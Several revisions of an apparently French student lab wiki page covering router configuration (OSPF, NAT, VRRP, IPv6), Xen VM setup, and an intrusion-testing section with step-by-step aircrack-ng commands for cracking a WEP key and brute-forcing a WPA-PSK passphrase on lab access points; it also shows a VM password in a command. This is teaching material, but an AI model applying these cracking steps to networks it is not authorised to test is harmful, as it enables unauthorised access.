! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
== Infrastructure physique ==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
== Création des VLANs ==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==Interconnexion avec Internet (IPv4)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==Interconnexion avec Internet (IPv6)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
=Installation de la machine virtuelle=&lt;br /&gt;
&lt;br /&gt;
== Création de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
...&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==Cassage de clef WEP d’un point d’accès WiFi==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
==Cassage de mot de passe WPA-PSK par force brute==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=52902</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=52902"/>
				<updated>2020-11-01T12:12:44Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* Services Internet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
--------------------&lt;br /&gt;
 Hostname              : trompettedelamort&lt;br /&gt;
 Distribution          : buster&lt;br /&gt;
 IP (non routée)       : 100.64.0.17&lt;br /&gt;
 IP (natée)            : 193.48.57.176&lt;br /&gt;
 Netmask               : 255.255.255.240&lt;br /&gt;
 Gateway               : 100.64.0.5&lt;br /&gt;
 IP Routeur1           : 100.64.0.5&lt;br /&gt;
 IP Routeur1           : 100.64.0.6&lt;br /&gt;
 IP commune routeurs   : 100.64.0.7&lt;br /&gt;
 VLAN                  : 316&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==Architecture générale==&lt;br /&gt;
Réalisé par le groupe 4 et 14.&lt;br /&gt;
&lt;br /&gt;
==Les réseaux virtuels==&lt;br /&gt;
Réalisé par le groupe 14... merci Guillaume&lt;br /&gt;
&lt;br /&gt;
==Interconnexion avec Internet (IPv4)==&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages.&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un '''ping''' vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
=Installation de la machine virtuelle=&lt;br /&gt;
&lt;br /&gt;
* Création de la machine virtuelle&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image...&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
** On riquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM: /etc/xen/trompettedelamort.cfg&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.16, ...']&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accés à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==Cassage de clef WEP d’un point d’accès WiFi==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=52886</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=52886"/>
				<updated>2020-10-31T13:32:30Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : a&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
--------------------&lt;br /&gt;
 Hostname              : trompettedelamort&lt;br /&gt;
 Distribution          : buster&lt;br /&gt;
 IP (non routée)       : 100.64.0.17&lt;br /&gt;
 IP (natée)            : 193.48.57.176&lt;br /&gt;
 Netmask               : 255.255.255.240&lt;br /&gt;
 Gateway               : 100.64.0.5&lt;br /&gt;
 IP Routeur1           : 100.64.0.5&lt;br /&gt;
 IP Routeur1           : 100.64.0.6&lt;br /&gt;
 IP commune routeurs   : 100.64.0.7&lt;br /&gt;
 VLAN                  : 316&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==Architecture générale==&lt;br /&gt;
Réalisé par le groupe 4 et 14.&lt;br /&gt;
&lt;br /&gt;
==Les réseaux virtuels==&lt;br /&gt;
Réalisé par le groupe 14... merci Guillaume&lt;br /&gt;
&lt;br /&gt;
==Interconnexion avec Internet (IPv4)==&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
